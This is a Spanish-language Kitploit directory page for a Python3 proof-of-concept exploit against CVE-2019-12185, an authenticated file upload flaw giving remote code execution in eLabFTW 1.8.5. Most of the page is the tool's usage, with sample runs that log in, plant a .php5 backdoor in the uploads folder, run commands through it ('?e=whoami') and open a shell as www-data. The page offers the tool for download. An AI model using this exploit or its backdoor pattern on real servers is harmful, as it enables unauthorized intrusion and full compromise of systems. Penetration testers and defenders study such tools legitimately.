Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/drew-alleman/cve-2019-12185
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubdrew-alleman/cve-2019-12185

CVE-2019-12185

CVE-2019-12185 - eLabFTW 1.8.5 Python3 Exploit POC

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-12185

eLabFTW 1.8.5 es vulnerable a la subida arbitraria de archivos a través del componente /app/controllers/EntityController.php. Esto puede resultar en la ejecución remota de comandos. Un atacante puede usar una cuenta de usuario para comprometer totalmente el sistema mediante una petición POST. Esto permitirá que se escriban archivos PHP en la raíz web y que se ejecute código en el servidor remoto. --> https://nvd.nist.gov/vuln/detail/CVE-2019-12185

Uso de ejemplo

Argumentos

root@kitploit:~
$ python3 CVE-2019-12185.py --help
usage: CVE-2019-12185.py [-h] [--shell SHELL] [-e EMAIL] [-P PASSWORD] [-u URL] [--port PORT] [--no-verify] [--silence-warnings]

eLabFTW 1.8.5 arbitrary file upload / RCE (Python3). Either use --shell to start an non-interactive shell, or provide login args to upload a new one.

options:
  -h, --help            show this help message and exit
  --shell SHELL         Full URL to existing .php5 backdoor in /uploads (e.g., https://host/uploads/..../abc.php5)
  -e, --email EMAIL     Login email
  -P, --password PASSWORD
                        Login password
  -u, --url URL         Base URL (e.g., https://192.168.1.10)
  --port PORT           Port override (defaults to 443 for https, 80 for http)
  --no-verify           Disable TLS certificate verification
  --silence-warnings    Silence urllib3 InsecureRequestWarning (effective only with --no-verify)
Descargar herramienta

Subir la reverse shell

root@kitploit:~
$ python3 CVE-2019-12185.py -e [email protected] -P password -u https://192.168.116.235 --no-verify --silence-warnings
[INFO] Disabled warnings about insecure https certifications.
[INFO] Loaded URL: 'https://192.168.116.235'
[INFO] Attempting to grab a form token from elabftw...
[INFO] Attempting to login with the provided credentials and form token...
[INFO] Succesfully sent payload to target!
[INFO] Check for a shell: https://192.168.116.235/uploads/
[INFO] Example RCE: https://192.168.116.235/uploads/82/82b757007585fa963c82b09.php5?e=whoami

Encontrar la puerta trasera

La puerta trasera se puede encontrar en el directorio de subidas de eLabFTW. image image

Obtener una shell

root@kitploit:~
$ python3 CVE-2019-12185.py --shell "https://192.168.116.235/uploads/4c/4cc58d211b453aa9b21b00b77284295de18300693f5755ea1f41b331a2d04384b9524bc87179601e55fdf5279dc945681ea1948ed6ac30c6ef4899db8c3a051a.php5" --no-verify --silence-warnings
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -las
total 12
4 drwxr-xr-x 2 www-data www-data 4096 Aug 16 23:14 .
4 drwxr-xr-x 4 www-data www-data 4096 Aug 16 23:14 ..
4 -rw------- 1 www-data www-data   45 Aug 16 23:14 4cc58d211b453aa9b21b00b77284295de18300693f5755ea1f41b331a2d04384b9524bc87179601e55fdf5279dc945681ea1948ed6ac30c6ef4899db8c3a051a.php5
$